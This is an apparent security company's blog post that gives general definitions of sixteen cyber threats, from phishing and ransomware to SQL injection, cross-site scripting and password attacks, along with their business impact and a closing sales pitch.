The 16 Major Types of Malware – Defined
Malware is an ever-rising threat to information technology security. With the introduction of advanced techniques and tactics, malware has quickly become a significant risk for any business’s online infrastructure. Understanding the different types of malware is essential to better equip IT specialists and security professionals in their fight against various forms of malicious software. In this blog post, we’ll provide a comprehensive overview of the 16 most common types of malware and brief descriptions to help you identify them and address potential threats.
- Phishing
What is it?
Phishing attacks are fraudulent emails, text messages, phone calls, or websites designed to manipulate people into downloading malware, sharing sensitive information, or taking other actions that expose themselves or their organizations to cybercrime.
How does it work?
Bulk email phishing is the most common type of phishing attack. A scammer creates an email message that appears to come from a large, well-known legitimate business or organization. And sends the message to millions of recipients. The victim clicks on a malicious link or file, and the malware is downloaded to their computer.
What types are there?
Spam, Spear Phishing, Whaling, Barrell Phishing, Vishing, Smishing, and Trap Phishing
What impact is it having on businesses?
- Unit 42’s recent survey found that 77% of intrusions are suspected to be caused by three initial access vectors – phishing, exploitation of known software vulnerabilities, and brute-force credential attacks focused primarily on the remote desktop protocol.
- Despite being one of its oldest tactics, phishing is an effective method for cybercriminals to access organizations. However, even though these attacks continue to work today, most enterprise risk management (ERM) and cybersecurity solutions must prioritize phishing detection and mitigation more.
- Vishing
What is it?
It usually comes as a phone call that sounds urgent or alarming. An unsolicited caller tells you your bank account has been compromised and that they need your PIN to verify your identity or unlock the account. These are all examples of “vishing,” a term that combines “voice” and “phishing” to describe a scam that relies on either a mobile or landline phone.
How Does it Work?
Vishing is an especially insidious cybercrime because the criminal callers often use threatening language to convince people they could get in serious trouble if they don’t follow the instructions (including legal action or arrest).
What types are there?
There are almost an endless number and types of Vishing scams. Criminal callers were pretending to be from your bank to get personal information and pretending to be from the IRS to collect money. Enrollment scams include criminals posing as representatives for government programs, such as the Social Security Administration or Medicare, and managing personal or financial information under the guise of helping you enroll or receive payments.
- DOS/DDOS Attack
What is it?
A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the regular traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. From a high level, a DDoS attack is like an unexpected traffic jam clogging up the highway, preventing regular traffic from arriving at its destination.
How does it work?
DDoS attacks are carried out with networks of Internet-connected machines. These networks consist of computers and other devices, such as IoT devices which have been infected with malware, allowing them to be controlled remotely by an attacker. These individual devices are referred to as bots (or zombies), and a group of bots is called a botnet. They send traffic or requests to the victim network, inevitably shutting down the ability of the network to handle legitimate requests such as customer orders, shipping orders, and email and chat communication.
What types are there?
A denial-of-service (DoS) attack floods a server with traffic, making a website or resource unavailable. A distributed denial-of-service (DDoS) attack is a DoS attack that uses multiple computers or machines to flood a targeted resource.
What impact is it having on businesses?
Distributed denial of service (DDoS) attacks are now an everyday occurrence. DDoS attacks are expected to continue to increase in number and complexity as botnets and inexpensive DDoS-as-a-service platforms proliferate. One of the most significant factors in the 2020 DDoS attacks was the COVID-19 lockdown, which drove a rapid shift to online for everything from education and healthcare to consumer shopping and office work, giving hackers more targets than ever.
- Adware
What is it?
Adware is a type of software that automatically displays or downloads advertising content, such as banners or pop-ups, on a user’s device, often without their consent. Adware generates revenue for its developers through advertising, and it can be intrusive and negatively impact user experience.
How does it work?
Adware bundles itself with free software or infiltrates devices through malicious websites or email attachments. Once installed, it monitors user behavior, displays targeted ads, and may even collect personal data.
What types are there?
Legitimate adware: This is included with free software or services as a means for developers to generate revenue. Users are typically informed of its presence, and it can be uninstalled.
Malicious adware: This type of adware is installed without user consent and may have harmful effects, such as stealing sensitive information or redirecting users to phishing websites.
What impact is it having on businesses?
Adware impacts businesses in several ways. Loss of productivity can occur as intrusive ads distract employees and slow down their work. Security risks are also a concern, as malicious adware may steal sensitive data or lead to more severe cyberattacks. In addition, adware infections can damage a company’s reputation, causing customers to lose trust in its ability to protect their data. Finally, businesses may face financial costs as they must invest in cybersecurity measures and employee training to combat adware and its consequences.
- Ransomware
What is it?
Ransomware is a type of malicious software (malware) designed to encrypt a victim’s data, rendering it inaccessible until a ransom is paid to the attacker for a decryption key.
How does it work?
Ransomware infiltrates a user’s system, often through phishing emails or infected software downloads, then encrypts the target’s files. The attacker then demands a ransom, usually cryptocurrency, for the decryption key to unlock the data.
What types are there?
Crypto Ransomware or Encryptors, Lockers, Scareware, Doxware or Leakware, RaaS (Ransomware as a Service)
What impact is it having on businesses?
The impact on businesses includes financial losses from ransom payments, downtime, critical data loss, reputational damage, and potential legal liabilities. It also forces companies to invest more in cybersecurity measures to prevent future attacks.
- Fileless Malware
What is it?
Fileless malware is malicious software that operates without leaving any traces on an infected computer’s hard drive or file system. Instead of relying on traditional files or executables, fileless malware resides in system memory, which makes it difficult to detect using traditional antivirus or anti-malware tools.
How does it work?
Fileless malware typically uses legitimate tools and processes already present in the system, such as PowerShell, Windows Management Instrumentation (WMI), or macros in documents, to carry out its malicious activities. This makes it challenging to detect and block, as it can blend in with normal system activities.
What types are there?
Memory-based fileless malware, Script-based fileless malware, Macro-based fileless malware
What impact is it having on businesses?
Fileless malware significantly impacts businesses, with recent examples such as the Emotet malware showcasing its destructive potential. Emotet enters systems via email attachments or links and then uses fileless techniques, such as PowerShell, to download and spread additional payloads within a network. This has resulted in widespread financial losses, data breaches, and disruptions to business operations. Fileless malware, including banking Trojans like Dridex, has also been observed using macros in documents or other legitimate tools to evade detection and steal sensitive information, leading to financial fraud and reputational damage for targeted businesses.
- Spyware
What is it?
Spyware is a type of malicious software that is designed to infiltrate a device or system without the user’s knowledge or consent. It is typically installed on a device covertly and gathers information about the user’s online activities, including websites visited, passwords entered, and personal data such as credit card numbers and browsing habits. This information is then transmitted to a remote server where it can be used for nefarious purposes.
How does it work?
Spyware can be installed through various methods, including email attachments, infected USB drives, and malicious websites. It can also be bundled with legitimate software or disguised as a legitimate application. Once installed, spyware operates in the background, silently collecting data without the user’s awareness. It can also have the ability to capture screenshots, record keystrokes, intercept communications, and even activate cameras and microphones to monitor the user’s activities.
What types are there?
There are several types of spyware, including keyloggers, adware, trojan horses, and tracking cookies. Keyloggers record keystrokes, allowing the attacker to capture sensitive information such as passwords and credit card numbers. Adware displays unwanted advertisements, often redirecting users to malicious websites. Trojan horses disguise themselves as legitimate software or files, allowing the attacker to gain unauthorized access to a system. Tracking cookies collect data about the user’s browsing activities and send it to remote servers for targeted advertising or other purposes.
What impact is it having on businesses?
Spyware can have severe impacts on businesses. It can result in the theft of sensitive business data, such as trade secrets, intellectual property, and customer information, which can lead to financial loss, reputational damage, and legal liabilities. Spyware can also disrupt business operations by causing system slowdowns, crashes, and other technical issues. Additionally, businesses may face regulatory fines and penalties for failing to protect customer data from spyware attacks. It is crucial for businesses to implement robust cybersecurity measures, including anti-spyware software, employee training, and regular security audits, to mitigate the risks posed by spyware.
- Trojan
What is it?
Trojan malware, commonly known as a Trojan or a Trojan horse, is a type of malicious software that appears to be legitimate and benign but is designed to deceive users and gain unauthorized access to their systems or steal sensitive information.
How does it work?
Trojans typically disguise themselves as harmless files or programs, such as attachments in emails or software downloads, and trick users into executing or installing them. Once installed, Trojans can perform various malicious activities, such as stealing personal data, logging keystrokes, taking control of the victim’s computer, launching distributed denial-of-service (DDoS) attacks, or installing other malware.
What types are there?
Remote Access Trojans (RATs), Keyloggers, Banking Trojans, DDoS Trojans
What impact is it having on businesses?
Trojans, such as Emotet and TrickBot, have been used to gain unauthorized access to businesses’ systems and steal sensitive data, leading to data breaches. For example, in 2020, Emotet was responsible for several high-profile data breaches, including those of government agencies, financial institutions, and healthcare organizations, resulting in financial losses and reputational damage.
- Worms
What is it?
Worms malware are self-replicating malicious software that can spread through networks or the internet without requiring any human intervention. They are designed to exploit vulnerabilities in computer systems and can cause harm to the infected systems and networks.
How does it work?
Worms malware typically infiltrates a system by exploiting security vulnerabilities, such as unpatched software or weak passwords. Once inside, they can replicate and spread autonomously to other systems, often using various communication methods such as email, instant messaging, or network shares. Worms can also carry payloads, which can include malicious actions such as data theft, destruction of files, or creating backdoors for future attacks.
What types are there?
There are different types of worms malware, including email worms, network worms, and internet worms.
What impact is it having on businesses?
Worms malware continues to pose significant threats to businesses, and recent examples highlight their damaging impact. For instance, the NotPetya worm, which emerged in 2017, caused widespread disruption and financial losses for global companies such as Maersk, Merck, and FedEx. NotPetya leveraged a Windows vulnerability to propagate rapidly across networks, encrypting data and rendering systems inoperable, resulting in massive business interruptions and financial damages.
- Virus
What is it?
A virus is a type of malicious code that can infiltrate an application and activate when the application is run. It has the potential to infiltrate a network and be used for various malicious purposes, such as stealing sensitive data, launching Distributed Denial of Service (DDoS) attacks, or executing ransomware attacks.
How does it work?
Virus malware works by exploiting vulnerabilities in computer systems or networks to gain entry. Once inside, it can replicate itself and spread to other devices or systems, often without the knowledge or consent of the user. It can execute various malicious activities such as deleting files, stealing passwords, intercepting communications, and conducting other harmful actions.
What types are there?
Worms, Trojans, Ransomware, Spyware, Botnets
What impact is it having on businesses?
The impact of virus malware on businesses can be severe, resulting in financial losses, reputational damage, legal and regulatory consequences, operational disruptions, and high remediation costs. For example, the 2021 ransomware attack on Colonial Pipeline, a major US fuel pipeline operator, led to temporary shutdown of operations, estimated losses of millions of dollars in ransom payment, and significant operational disruptions, highlighting the detrimental effects that virus malware can have on businesses. It emphasizes the critical need for robust cybersecurity measures to protect against such threats.
- Rootkits
What is it?
A rootkit is a type of malicious software that grants unauthorized access and remote control of a victim’s computer, providing full administrative privileges to the attacker. Rootkits can be injected into various components of a system, including applications, kernels, hypervisors, or firmware. They are often distributed through methods such as phishing, malicious attachments, downloads, or compromised shared drives. Rootkits can also be utilized to hide other types of malware, such as keyloggers, making them a potent tool for cybercriminals.
How does it work?
Rootkits work by modifying or replacing system files, processes, or components in order to hide their presence and gain elevated privileges on a system. They can intercept system calls and manipulate system data to control system behavior and evade detection by antivirus or security software. Rootkits often operate at the kernel level, which gives them deep access to the operating system and allows them to hide their presence from regular system monitoring tools.
What types are there?
Hardware or firmware rootkit, Bootloader rootkit, Memory rootkit, Application rootkit, Kernel mode rootkits
What impact is it having on businesses?
The impact of rootkits on businesses can be severe, resulting in significant financial and reputational damage. For example, the SolarWinds supply chain attack in 2020, which involved a rootkit injected into software updates, led to data breaches and disruptions for numerous organizations, including government agencies and Fortune 500 companies. This incident resulted in financial losses and reputational damage and highlighted the need for robust cybersecurity measures to detect and mitigate rootkits and their potential impact on businesses.
- Malware Attacks
What is it?
Malware Attacks is an umbrella term for almost every type of cyber attack. For the most part, a cyber attack and a malware attack are synonymous terms. A malware attack is a common cyberattack where malware (normally malicious software) executes unauthorized actions on the victim’s system. The malicious software (a.k.a. virus) encompasses many specific types of attacks such as ransomware, spyware, command and control, and more.
How Does it Work?
Malware discussion typically encompasses three main aspects:
- Objective: What the malware is designed to achieve
- Delivery: How the malware is delivered to the target
- Concealment: How the malware avoids detection (this item is beyond the scope of this discussion)
What Types Are There?
The types of malware attacks are almost endless. Any type of attack that involves delivering malicious programs, code, or website links to malicious sites that automatically deliver the malicious program to the victim system. Malware attacks include ransomware, trojans, worms, spyware, adware and many more.
What impact is it having on businesses?
Because “malware attack” is an umbrella term, any attack under it, including ransomware attacks, has a devastating impact on businesses.
- SQL Injection
What is it?
SQL injection (SQLi) is a cyberattack that injects malicious SQL code into an application, allowing the attacker to view or modify a database. SQL injection attacks often target confidential information in a database like customer PII. There are a variety of SQL attacks; many will give criminals full access to a system, allowing them to change, delete or exfiltrate data.
How Does it Work?
SQL is a language used in programming that is designed for data in a relational data stream management system. SQL queries execute commands, including commands to retrieve data, update data and delete records. To execute malicious commands, an attacker can insert malicious code into strings that are passed to a SQL server to execute.
What Types Are There?
Quite a few include Boolean injection, time-based injection, inferential SQL injection, and more. They typically take advantage of a vulnerability in a web application.
What impact is it having on businesses?
SQL, an abbreviation of Structured Query Language, is a programming language that makes it easy for application developers and relevant stakeholders to access and store data within a relational database. And as we know, databases contain personal customer data, proprietary company data, and more.
- Man-in-the-Middle Attack (MitM)
What is it?
It is a cyberattack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other, as the attacker has inserted themselves between the two parties.
How Does it Work?
An attacker within the reception range of an unencrypted Wi-Fi access point could insert themselves as a man-in-the-middle. As it aims to circumvent mutual authentication, a MITM attack can succeed only when the attacker impersonates each endpoint sufficiently well to satisfy their expectations.
What Types Are There?
There are quite a few types of MITM attacks, including the following:
- The attacker installs a packet sniffer to analyze network traffic for insecure communications.
- When a user logs in to a site, the attacker retrieves their user information and redirects them to a fake site that mimics the real one.
- The attacker’s fake site gathers data from the user, which the attacker can then use on the real site to access the target’s information.
What impact is it having on businesses?
In a banking scenario, an attacker could see that a user is making a transfer and change the destination account number or amount being sent. Threat actors could use man-in-the-middle attacks to harvest personal information or login credentials.
- Cross-Site Scripting
What is it?
A cross-site scripting attack occurs when cybercriminals inject malicious scripts into the targeted website’s content, which is then included with dynamic content delivered to a victim’s browser. The victim’s browser has no way of knowing that the malicious scripts can’t be trusted and therefore executes them.
How Does it Work?
Malicious scripts can access any cookies, session tokens, or other sensitive information retained by the browser and used within that site. Attackers can also use XSS to spread malware, rewrite the contents of websites, cause trouble on social networks.
What Types Are There?
There are 3 types of cross-scripting attacks, including Reflected (non-persistent) XSS, which is the most popular. To execute this type of invasion, attackers craft malicious links, phishing emails, or use various other techniques to trick victims into sending malicious requests to the server.
What impact is it having on businesses?
Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account. XSS can also impact a business’s reputation. An attacker can deface a corporate website by altering its content, thereby damaging the company’s image or spreading misinformation.
- Password Attacks
What is it?
Password attacks are one of the most common forms of corporate and personal data breach. A password attack is simply when a hacker tries to steal your password. In 2022, 81% of data breaches were due to compromised credentials.
- Regular phishing. You get an email from what looks like goodwebsite.com asking you to reset your password, but you didn’t read it closely, and it’s actually goodwobsite.com. You “reset your password,” and the hacker steals your credentials.
How Does it Work?
Criminals can get passwords through phishing, MITM attacks, and other types of attacks, which they use to have the either type their password into a fake website that the criminal can view. Or through the phishing example above.
What Types Are There?
In addition to Phishing and MITM attacks, criminals use Brute Force, Dictionary, Keylogging, and Credential Stuffing attacks.
- Brute Force – If a password is equivalent to using a key to open a door, a brute force attack is using a battering ram. A hacker can try 2.18 trillion password/username combinations in 22 seconds, and if your password is simple, your account could be in the crosshairs.
What impact is it having on businesses?
In 2021, hackers used different password attack types, but brute force was used for more than 60% of the breaches.
Conclusion
It’s essential to be aware of the many different types of malware, how they work, and the damage they can cause as part of securing any online infrastructure. With advanced techniques and tactics, cybercriminals have become more sophisticated in creating new forms of malicious software that often go unnoticed.
The 16 most common types of malware are a good starting point for businesses seeking advice on identifying and handling malware threats. If you’re looking for a full-service IT risk management solution with experienced security professionals who understand these threats, call us today. We’ll be happy to provide further assistance with critical detection, prevention, and analysis services to help secure your systems from potential damage caused by these malicious infections. With the right knowledge and resources at your disposal, you can always stay one step ahead of cybercriminals and their malware attacks.